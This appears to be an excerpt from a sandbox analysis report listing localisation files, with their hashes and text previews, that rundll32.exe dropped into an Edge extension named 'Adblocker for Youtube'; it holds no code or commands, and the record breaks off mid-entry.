C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\ko\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\lt\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):149
Entropy (8bit):4.915447629764539
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWQeDl8K5gBZYK/R7WHM+O3eC4omW+FkkW5Hb+511n:bk/dP6Gyyl826R7IOuNo+Fsa
MD5:1AD07246758F88714FD02AEE442F86EC
SHA1:64CC12DF3A673E2673F55C3D0D7683B5D8DF99BD
SHA-256:4F19A929F71B3A20E145B12B61377E610D70CA1A020CEE8D0E8EBF38D7F1F0CA
SHA-512:2D7BBF619D25C382B6357372CA7A29DA22B682FC3B12795A83654DFE109EB1CCB81E4D7304354A9B3AC324C7D9822E0A81563CA8920BC06DFFA733BA3C849168
Malicious:false
Preview:.{"appName":{"message":"Adblocker u. \" Youtube.\""},"appDesc":{"message":"Ie.kote video adblock? Kad parsisi.sti Adblocker \"Youtube\".."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\lv\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):149
Entropy (8bit):4.9824655648065
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHTfPIOJ5itFC/hqQ5hHHB2W8xBT1n:bk/dP6GeRVR7SfPzJ8tFIdFBWj1
MD5:C903EB1F9762BB428DF73858E79FC5C6
SHA1:D367BEF71658D76611A2E7F0E5FA3F8AAC3EBE43
SHA-256:BD607C80998190DE84D4D5610A2B8F4BCEE0D9500BC753DDFEB0B5A94F4DD4AE
SHA-512:1EC0115709D39F34C503F383B896442B4D34A5529F142D352A1ED94F4D275BAD3385EA9ADD4B5035E9BCAFA46452FF25C0C8074606200B29E627430E9D333AD0
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Vai j.s mekl.jat video adblock? Lai lejupiel.d.tu Adblocker Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\mk\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):194
Entropy (8bit):4.959575701188163
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW1SfGKgBBVR7WHVxEdO9aX1jF0l1V1yVF1Gv1lhaiVVfoEgGqOTg:bk/dP6G7RVR7UxEUYXPdvYv88VQEoRj1
MD5:711BE6153463FB924A8CB817DC59DCEC
SHA1:13CB5590E37FC03385875640AB40D87C8640DB7E
SHA-256:28DF1E64F5E5EE71277B6C154A7905F11C20C6C1115433DF23485FAE299AD7AE
SHA-512:7B276E3675D004A3337D0F38F828D7BB4AB8E2F23C2BEDFE29496DC700C71E62727C20533BBF0A45F9119A452404D2658B63F6A7BB1052DA7F862024F32AD0EE
Malicious:false
Preview:.{"appName":{"message":"Adblocker .. Youtube."},"appDesc":{"message":".... ... .. ....... .. ..... adblock? .... ......... Adblocker .. Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\ml\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\mr\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\ms\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\nl\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):153
Entropy (8bit):4.778562590537941
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWToFBBVR7WHHaQgFfqFG3C3C4pIHWWToFBT1n:bk/dP6G+VVR7GaQK3a62f1
MD5:7EECC4311200A6726C4EDFCEEAEF1220
SHA1:A97F8C0E81CACCC9FA581DC44DA73E7234DC53A0
SHA-256:EA3C7300E6523FE08C28F073E7A34D043467E6EED330A031BC23CADA905762DC
SHA-512:2DCE3EA0649FD1946C40AAB054CBF37CA3E7EEE66DB0A8A0335F0BE3C0622A5C1714C7312A8BCE92667EF955845AC4E78E7B4B83D3C96DD425371EE9A77F5E70
Malicious:false
Preview:.{"appName":{"message":"Adblocker voor Youtube."},"appDesc":{"message":"Bent u op zoek voor video adblock? Dus download Adblocker voor Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\no\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):152
Entropy (8bit):4.887676383355589
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHA0Fn8RRrdCg1JEWG/WDMF8xBT1n:bk/dP6G5VR7gn0JV1JE61
MD5:CE1C94D6CE80894AC99A2E9076B30B7C
SHA1:BB67FF27CB03C4DE720390BD03B417E96DC8B4AB
SHA-256:DA8F186B15A95192E69A3924545DE56516C7618236E85BD2C84AB3AAD8B117FB
SHA-512:D713C90E9B670CBDC2C2BE8C5F0080FDF93A7CA8B2BFE5D3410B452FE68BBFDEC98A9A6DD3CA13146ED6B0AD9B28A3A97D27B8E044A5758949B185531BB619DA
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Er du p. jakt etter video adblock? S. last ned Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\pl\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\pt\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\pt_BR\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\pt_PT\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\ro\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\ru\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):262
Entropy (8bit):4.5033681386610525
Encrypted:false
SSDEEP:6:bk/dPeARd/5yXZEcVR7U95DRd/2XfUbvYfWbsRd/5yXZ0Y:4dmARh5cekFU9lRhSfUEW4Rh5cKY
MD5:CA49D076ACD74F2FAF38C51BB94A7655
SHA1:3CFC0948599DEA9B054019A27B4EAC0EC0546EF1
SHA-256:506CFB234C07A5087B7522469415660710FD9112BEFFFF2008C6E68DC05F0A3B
SHA-512:ADCCDD574363EC1E01D903496A1F7E4C50AC65AAB82C564B14D0749FDE22A7C0FD1FD25DF809B3FCEE0235CA1FEED6EF2DCE8D9E225758178B9F21D77D7D5C27
Malicious:false
Preview:.{"appName":{"message":"........... ....... ... ......"},"appDesc":{"message":"..... ........... ..... .......? ..... ......... ........... ....... ... ......."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\sk\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):143
Entropy (8bit):5.010701769608737
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWLt2gBBVR7WHNhbAyA2eCnngXR3L1hxJMWLt2gBT1n:bk/dP6GlVR7Mh8p3+gB3pXX1
MD5:A43FFF6CFE872C583DB062871D25CA36
SHA1:37F424E9CAF6604C494CFE5852939928579D57F3
SHA-256:4988A2D80C4F9E21C5C1614E3499C85A363E945D1288BC855A4A716A7FA5CA20
SHA-512:8C83C839805402FBDA12B27E9730E3815A286A37A6880202068C23F74603FE970ED3BF4C03F6F7AA194909E33AD2FA9A1DA21AA3F2D2A04516FD719DA565A6B0
Malicious:false
Preview:.{"appName":{"message":"Adblocker na Youtube."},"appDesc":{"message":"H.ad.te video adblock? Tak.e stiahnu. Adblocker na Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\sl\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):138
Entropy (8bit):4.923079352507677
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWft2gBBVR7WHMgE/RAFJeCnnGF6JMWft2gBT1n:bk/dP6G5VR7y7i+S6j1
MD5:D8084714517DD44C55C4CD0F73A2B0BD
SHA1:ED51C0EE20DDF94E3ED1E2F95FDBE62921098B96
SHA-256:B0F22F0F3C8361CAD77040ACD0FBFC8904D697F108119F0CAC61C35243EA0729
SHA-512:DAA57D28D044C594F85B5FA0A22FD7498165904861CCD33AC84F58314AB3414618F08C67D58E3473C8CF67C97588E6D69FE68C401360B55E24BB2C2725414083
Malicious:false
Preview:.{"appName":{"message":"Adblocker za Youtube."},"appDesc":{"message":"I..ete video adblock? Tako prenesi Adblocker za Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\sq\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):171
Entropy (8bit):4.969371046083134
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVmBFBBVR7WHPaDFJDwOSC47/MSLJMWVmBFBT1n:bk/dP6GwVVR7OmsOSNzMpf1
MD5:BED2C5E327380FAD31DD34DFF7874A74
SHA1:86AC1C9F97B35A01B340C0B1ADB2529517F2B641
SHA-256:481D2C35471F8C852438AD51BD45B237FCD29A6FF859AD7EC25D4F195FA17B13
SHA-512:B308D0F1F61B179D2F7CAABCCBA2488FAE4FF50A8A186F4EAB8E7B0F0AC1C14B38EE44DA6D76E6234BF119965BA03B30D72524A4838FB6A9952BE2CD9AC8656B
Malicious:false
Preview:.{"appName":{"message":"Adblocker p.r Youtube."},"appDesc":{"message":"Ju jeni n. k.rkim p.r video adblock? K.shtu q. t. shkarkoni Adblocker p.r Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\sr\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\sv\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.913200195070275
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDmTWxBBVR7WHJAiXFPmVkJEBHW1JE3s01WDmTWxBT1n:bk/dP6GZRVR7I9EV1W1JE3sfj1
MD5:910A00B8A4A73C896AAD63A769D682E8
SHA1:B99FB9F9195908EC1213E5DC0DAB5676CD01A08B
SHA-256:89DDAFA626E66297FE0FFB684756D959AC5774DA65197CCB7C1EEDAA7186CB42
SHA-512:E3F6F3D1AAA63E61ACE198EB116387AA3483DCB4C43E6D92231500B71FB80022EB03A767872B7EF5CE4846DDF90F631D5472C62BE59106AA9A358123A14E650A
Malicious:false
Preview:.{"appName":{"message":"Adblocker f.r Youtube."},"appDesc":{"message":"Letar du efter videon adblock? S. ladda ner Adblocker f.r Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\sw\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\ta\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\te\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\th\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\tr\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):141
Entropy (8bit):4.98798149548062
Encrypted:false
SSDEEP:3:bk/rhPUHcxBiMxIkZUkkVVR7WHTlbPtXCcAWaGK5gBiMxKBWIpKZYHYY:bk/dPvviVR7SlbtCY/UWp6
MD5:9222A5F6A75F38F60ABF1D5F5137CFE3
SHA1:81837EA5D2788D5FFFF21DB29977DDEE50FDB00A
SHA-256:EC917A8DCB1D40EAB935C4BC7F9F9057CF7AF892D56DEBC945DD283A294766F8
SHA-512:9DC69347DB4BE3D15452C0C04B3E456F202707D3868884B201B80A7C19A89D437A70B7B67886873C73BD1BD475033348DA8FCB9B93B501AF8C358F7784FDB245
Malicious:false
Preview:.{"appName":{"message":"Youtube.i.in Adblocker"},"appDesc":{"message":"Video adblock ar.yorsunuz? Youtube.i.in indirme Adblocker."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\uk\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):198
Entropy (8bit):4.820396470880301
Encrypted:false
SSDEEP:6:bk/dPe1Sq89abu1VR7U3ydX8d0v+cHf5Vqaq89abu/1:4dm1SlAeFUyX8d0WaqCAI1
MD5:984B0001491DCC9814D4954EB7009008
SHA1:AB87E0E7A8DAB7D178CE00551B943F67E683DF21
SHA-256:AA3211517E590FDAF9866DC06C59018C16617109782866466F8296741EAE7400
SHA-512:F80E86CE6BC1EF2F272296B7BF7E84C89A2BBE10A5BE0719CA913ABAA482F520CB6BBF416E2704D70783434EBB7A4B8295006EC883D3D47847F435061FB93F3E
Malicious:false
Preview:.{"appName":{"message":".......... ... YouTube."},"appDesc":{"message":".. ....... ..... ......? ... ....... .......... ... YouTube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\vi\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
